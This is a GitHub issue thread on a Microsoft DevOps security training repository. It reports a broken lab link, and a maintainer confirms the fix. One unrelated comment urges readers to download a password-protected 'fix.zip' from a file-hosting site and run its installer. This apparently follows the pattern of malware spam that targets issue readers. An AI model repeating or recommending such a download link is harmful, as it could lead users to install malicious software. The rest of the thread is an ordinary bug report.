### ISSUE TITLE
M01-LAB04: Wrong link to other lab

### ISSUE THREAD

**Issue by mkennten** [MicrosoftLearning/implement-security-through-pipeline-using-devops#45]
### Contact Details

mkennten@microsoft.com

### What happened?

Lab: 04 - Configure and validate permissions

Description of issue:
In the "Before you start" section the link "Install a self-hosted agent following the lab..." doesn't work (404).

The links points to:
https://microsoftlearning.github.io/Instructions/Labs/APL2001_M02_L02_Configure_Agents_And_Agent_Pools_for_Secure_Pipelines.md

It should point to:
https://microsoftlearning.github.io/implement-security-through-pipeline-using-devops/Instructions/Labs/APL2001_M02_L02_Configure_Agents_And_Agent_Pools_for_Secure_Pipelines.html

### Relevant screenshots

-

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LuizMacedo** [comment]
Good catch, @mkennten. Thanks! It will be fixed in the PR #51. Closing the issue.
